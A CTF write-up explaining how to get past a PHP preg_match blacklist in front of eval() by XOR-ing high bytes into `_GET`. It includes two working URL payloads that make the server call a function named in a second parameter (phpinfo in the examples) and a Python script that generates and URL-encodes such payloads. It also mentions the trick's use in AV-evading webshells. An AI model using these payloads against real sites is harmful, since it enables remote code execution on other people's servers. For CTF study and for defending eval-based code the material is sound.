Bypassing PHP preg_match with XOR (CTF)

0x00: Preface

I have run into this type of challenge in both SUCTF and Qiangwang Cup, so I am writing it down here as a note.

<?php
$hhh = @$_GET['_'];
if (!$hhh){
    highlight_file(__FILE__);
}
if(strlen($hhh)>18){                                                  // check 1: at most 18 bytes
    die('One inch long, one inch strong!');
}
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )    // check 2: byte blacklist
    die('Try something else!');
$character_type = count_chars($hhh, 3);                               // string of the distinct bytes in $hhh
if(strlen($character_type)>12) die("Almost there!");                  // check 3: at most 12 distinct bytes
eval($hhh);
?>

Challenge source.

Two things have to be bypassed:

1: The length limit. The real code can be handed over in a second GET parameter and referenced through $_GET[x]; only the `_` parameter is subject to the 18-byte limit.

2: preg_match. It can be bypassed with XOR.

(The third check, count_chars(), allows at most 12 distinct bytes; the XOR payload below repeats a single key byte, so it satisfies that check as well.)

0x01: Ideas

In development, XOR is sometimes used in place of an if test:

$a = 1 ^ 1; // 0

$a = 0 ^ 0; // 0

$a = 1 ^ 0; // 1

$a = 0 ^ 1; // 1

It returns 0 or 1.

First, the regex:

/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i

\xNN matches the character whose ASCII code is NN in hex. Note that the class is not the whole range [\x00-\x7F]: `\x00- ` is the range from 0x00 to the space character (the control characters and space), then come the digits, the letters, the quotes, the backtick, and ~ _ & . , | = [ and finally 0x7F (DEL). Everything it lists is a single-byte ASCII character, so nothing multi-byte (Chinese, for instance) is caught.

What matters for the bypass is what is NOT in the class: $ { } ( ) ^ ; and a few other punctuation characters survive, and so does every byte from 0x80 to 0xFF. Alphanumerics and most of the usual PHP punctuation are filtered, which is why the payload has to be built out of the leftovers.

Bypass principle

Take an AV-evading webshell as an example. When building one you can lean on a PHP language feature: applying `!` to a character converts it to bool, and when a bool meets an arithmetic operator, true is automatically converted to the number 1 and false to 0. Compute the numbers you need from bools, turn them into characters with chr(), and join the pieces with `.`; that is enough to get past a preg_match filter.

(This is one of the places where PHP differs from other languages.)

But many preg_match filters also block `.`, so the XOR operation is used instead, and many AV-evading webshells are built this way. PHP XORs two strings byte by byte: each character is first turned into its ASCII code, the codes are XORed, and the result becomes a character again. For example "123" ^ "abc" XORs "1" with "a", then "2" with "b", and so on; after the XOR you get the string you wanted.

Caveat: the operands are converted according to their type. If a number (int) is XORed with a string, the result is a number: 1 ^ "a" is 1 and "a" ^ 2 is 2. To turn a number into a string, the trim() function can be used (it returns its argument as a string).

Going further: because of PHP's undefined-constant behaviour, a bare word is automatically treated as the quoted string of its own name, and bytes with an ASCII code greater than 0x7F are accepted in such a name, so they are treated as a string as well. This also simplifies the XOR: XOR any character with 0xff and you get its bitwise complement, so there is less to compute. (This only holds on PHP 7: PHP 8 throws an Error for an undefined constant.)

Passing the characters in via GET or POST to get around preg_match:

If the code given to eval() contains an expression like "abc" ^ "def", it is evaluated first and the result is then executed, so we can create extra parameters to make things more convenient, e.g. pass `?a=$_GET[b]`; b is not subject to the filter, so any value can be passed in it, but:

Note 1: during testing it turned out that for something like phpinfo(); the `();` has to come after the index, e.g. `url?a=${_GET}{b}();&b=phpinfo`, that is `a=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo`. What arrives is literally `${????^????}{?}();`, but inside eval() it becomes `${_GET}{?}();` and runs successfully.

Note 2: testing also showed that `[` cannot be used for the index, because it is caught by the filter; `{}` can be used instead. Thanks to the undefined-constant behaviour, `${_GET}{a}` is not an error: `_GET` inside `${}` is treated as the string "_GET", which gives `$_GET`, and `{a}` is the old curly-brace array offset with `a` again treated as a string, so the whole expression is `$_GET['a']`. (Curly-brace array access was deprecated in PHP 7.4 and removed in PHP 8.0.)

A GitHub write-up that explains this part:

https://github.com/Samik081/ctf-writeups/blob/master/ISITDTU%20CTF%202019%20Quals/web/easyphp.md

To sum up: the length limit is bypassed by handing the code over via $_GET[x], and preg_match is bypassed with XOR.

0x02:payload

A small fuzz script can be used to find bytes that XOR to _GET. Two working payloads:

url?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=phpinfo

url?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

In both, four copies of one key byte are XORed with four bytes chosen so that the result is _GET (0xfe ^ 0xa1 = 0x5f = '_', 0xfe ^ 0xb9 = 0x47 = 'G', and so on). What is sent is literally `${????^????}{?}();`: 18 bytes long with 12 distinct bytes, so it passes all three checks. Inside eval() it becomes `${_GET}{?}();`, i.e. `$_GET['?']()`, which calls phpinfo.
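The fuzz script mentioned above and the `${A^B}{K}();` construction from 0x01, as an added Python example (not code from the original post or from the challenge): it replays the three server-side checks, searches for a key byte that turns _GET into bytes the blacklist accepts, assembles the 18-byte payload, URL-encodes it, and shows what the XOR inside `${...}` evaluates to. The helper recovered_name() only understands the exact payload shape built here; the function name phpinfo and the use of the key byte as the name of the second parameter follow the write-up's payload.

```python
import re
from urllib.parse import quote

# The challenge's blacklist as a bytes regex, so it is applied to raw bytes like PHP does.
# It rejects 0x00-0x20, digits, letters, ' " ` ~ _ & . , | = [ and 0x7F;
# $ { } ( ) ^ ; and every byte 0x80-0xFF survive, which is all the payload needs.
BLACKLIST = re.compile(rb'[\x00- 0-9A-Za-z\'"`~_&.,|=\[\x7F]')

MAX_LEN = 18        # strlen($hhh) > 18 dies
MAX_DISTINCT = 12   # count_chars($hhh, 3) returns each distinct byte once


def xor_strings(a: bytes, b: bytes) -> bytes:
    """PHP's "str" ^ "str": byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def passes_filter(code: bytes) -> bool:
    """Replay the three checks the challenge runs before eval()."""
    return (len(code) <= MAX_LEN
            and BLACKLIST.search(code) is None
            and len(set(code)) <= MAX_DISTINCT)


def find_key(target: bytes) -> int:
    """Highest key byte k such that k itself and every byte of target ^ k pass the filter.
    Searching from 0xFF downwards reproduces the %ff payload from the write-up."""
    for key in range(0xFF, 0x7F, -1):
        encoded = xor_strings(target, bytes([key]) * len(target))
        if BLACKLIST.search(bytes([key]) + encoded) is None:
            return key
    raise ValueError("no single key byte survives the filter")


def build_payload(func: str = "phpinfo"):
    """Build ${KKKK^EEEE}{K}(); which eval() turns into ${"_GET"}{"K"}(), i.e. $_GET["K"]().
    Returns (raw code for the _ parameter, key byte, URL query string)."""
    key = bytes([find_key(b"_GET")])
    encoded = xor_strings(b"_GET", key * 4)          # bytes that XOR back to _GET
    code = b"${" + key * 4 + b"^" + encoded + b"}{" + key + b"}();"
    # The function name travels in a second parameter named after the key byte;
    # that parameter is never run through the filter.
    query = "?_=" + quote(code, safe="") + "&" + quote(key, safe="") + "=" + func
    return code, key, query


def recovered_name(code: bytes) -> bytes:
    """What the XOR inside ${...} evaluates to for the payload shape built above
    (undefined constants become their own name as a string, PHP 7 behaviour)."""
    m = re.fullmatch(rb"\$\{(.{4})\^(.{4})\}\{(.)\}\(\);", code, re.DOTALL)
    if m is None:
        raise ValueError("unexpected payload shape")
    return xor_strings(m.group(1), m.group(2))


if __name__ == "__main__":
    code, key, query = build_payload()
    print(query)
    print("passes filter:", passes_filter(code), "| ${...} ->", recovered_name(code))
```

Running the script prints the percent-encoded query string for the `_` parameter; the same check functions can be pointed at any other candidate, for instance to confirm that the plain `$_GET[a]();` form is rejected by the blacklist while the 0xfe variant from the write-up is accepted.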

0x03: References

https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
https://www.jianshu.com/p/fbfeeb43ace2



Source: www.cnblogs.com/Tkitn/p/11628100.html